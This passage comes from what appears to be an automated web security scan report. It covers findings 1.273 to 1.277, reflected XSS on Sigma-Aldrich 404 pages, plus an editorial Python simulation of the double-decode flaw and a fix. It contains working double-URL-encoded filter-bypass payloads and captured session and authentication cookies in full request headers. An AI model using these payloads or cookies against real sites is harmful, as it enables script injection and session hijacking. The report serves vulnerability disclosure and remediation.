       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc971b0";alert(1)//4074737e8c2/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...
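
The findings above are one defect reached through different path segments: a blacklist that runs after the web server's single URL-decode, followed by a second decode inside the application, with the result copied into a double-quoted JavaScript string in the 404 page's cmCreateErrorTag call. The Python below is an added editorial simulation of that pipeline, not scanner output and not the site's code. The payload and the echoed script line are taken verbatim from finding 1.267; the blacklist contents, the render_404_vulnerable and render_404_fixed handlers and the small JS-literal parser are assumptions for illustration. It shows why the single-encoded payload is blocked and the double-encoded one is not, and what the hardened sink (one decode, then JavaScript-string escaping at output) emits instead.

```python
"""Simulation of the double-URL-decode XSS reported in findings 1.267-1.273.

Pipeline, as the issue and remediation text describe it:
  1. the web server percent-decodes the request path once;
  2. an application filter rejects characters commonly used in XSS
     (the report does not list the blacklist; one is assumed here);
  3. the application percent-decodes the path a second time (the defect);
  4. the 404 handler copies the resulting URL into a double-quoted
     JavaScript string literal in cmCreateErrorTag(...).
The handler functions and the tiny JS-literal parser are illustrative
assumptions, not the site's code.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Payload and echoed line taken verbatim from finding 1.267 (REST URL parameter 2).
PAYLOAD = "48eb3%2522%253balert%25281%2529%252f%252f508adc6d619"
ATTACK_PATH = ("/etc/medialib" + PAYLOAD
               + "/countries/united-states/press-releases/safc-corporate-logo")
ONCE_DECODED_PATH = unquote(ATTACK_PATH)      # what the web server hands over
REPORTED_SCRIPT = ('cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402'
                   '/etc/medialib48eb3";alert(1)//508adc6d619'
                   '/countries/united-states/press-releases/safc-corporate-logo","E404") ;')

ORIGIN = "http://www.sigmaaldrich.com:4402"
BLOCKED = set('"\'<>')          # assumed blacklist, checked after the first decode


def filter_allows(path: str) -> bool:
    """Step 2: the assumed blacklist filter; True means the request proceeds."""
    return not any(c in BLOCKED for c in path)


def render_404_vulnerable(raw_path: str) -> Optional[str]:
    """Steps 1-4 as the vulnerable application behaves.
    Returns the emitted script statement, or None if the filter blocked it."""
    once = unquote(raw_path)                 # step 1: web server decode
    if not filter_allows(once):              # step 2: filter sees %22, not "
        return None
    twice = unquote(once)                    # step 3: the defect, a second decode
    return 'cmCreateErrorTag("Error 404 | %s%s","E404") ;' % (ORIGIN, twice)


def js_string_escape(value: str) -> str:
    """Escape a value for a double-quoted JS string literal: everything except
    alphanumerics and a few URL punctuation characters becomes \\xHH or
    \\uHHHH, so neither the JS parser nor the HTML parser can see a delimiter
    (quotes, backslash, <, >, &, % and line terminators all end up escaped)."""
    out = []
    for ch in value:
        if ch.isalnum() or ch in " ./:-_|":
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)


def render_404_fixed(raw_path: str) -> str:
    """Hardened handler: one decode only, and context-aware escaping at the
    sink, so safety no longer rests on the blacklist."""
    once = unquote(raw_path)
    return 'cmCreateErrorTag("Error 404 | %s","E404") ;' % js_string_escape(ORIGIN + once)


def first_js_string_literal(script: str) -> Optional[str]:
    """Return the raw body of the first double-quoted JS string literal in
    `script`, honouring backslash escapes; None if it is unterminated.
    On the vulnerable output the literal ends at the injected quote."""
    start = script.find('"')
    if start < 0:
        return None
    i = start + 1
    while i < len(script):
        if script[i] == "\\":
            i += 2
            continue
        if script[i] == '"':
            return script[start + 1:i]
        i += 1
    return None


def js_unescape(literal: str) -> str:
    """Resolve \\xHH and \\uHHHH escapes, giving the value a browser would see."""
    return re.sub(r"\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), literal)


if __name__ == "__main__":
    print("single-encoded:", render_404_vulnerable(ONCE_DECODED_PATH))   # None: blocked
    print("double-encoded:", render_404_vulnerable(ATTACK_PATH))         # breaks out
    print("fixed sink:    ", render_404_fixed(ATTACK_PATH))              # literal intact
```

Run stand-alone it prints the three cases; the vulnerable output for the double-encoded path is byte-for-byte the script line shown in finding 1.267, while the fixed handler keeps the whole URL inside one string literal and the browser still sees the once-decoded URL as the string's value.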

1.273. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c978a%2522%253balert%25281%2529%252f%252f673593163e9 was submitted in the REST URL parameter 2. This input was echoed as c978a";alert(1)//673593163e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's single decode turns %253c into %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into a literal <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibc978a%2522%253balert%25281%2529%252f%252f673593163e9/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:41 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibc978a";alert(1)//673593163e9/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.274. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70bda%2522%253balert%25281%2529%252f%252fb8deff2092e was submitted in the REST URL parameter 3. This input was echoed as 70bda";alert(1)//b8deff2092e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs70bda%2522%253balert%25281%2529%252f%252fb8deff2092e/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:42 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs70bda";alert(1)//b8deff2092e/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.275. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84739%2522%253balert%25281%2529%252f%252fe4b7ff632bb was submitted in the REST URL parameter 4. This input was echoed as 84739";alert(1)//e4b7ff632bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich84739%2522%253balert%25281%2529%252f%252fe4b7ff632bb/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich84739";alert(1)//e4b7ff632bb/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.276. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 713b6%2522%253balert%25281%2529%252f%252f78a955d0321 was submitted in the REST URL parameter 5. This input was echoed as 713b6";alert(1)//78a955d0321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/docs/Aldrich/Brochure713b6%2522%253balert%25281%2529%252f%252f78a955d0321/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/docs/Aldrich/Brochure713b6";alert(1)//78a955d0321/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.277. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db3a5%2522%253balert%25281%2529%252f%252f5df5dbd717c was submitted in the REST URL parameter 6. This input was echoed as db3a5";alert(1)//5df5dbd717c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

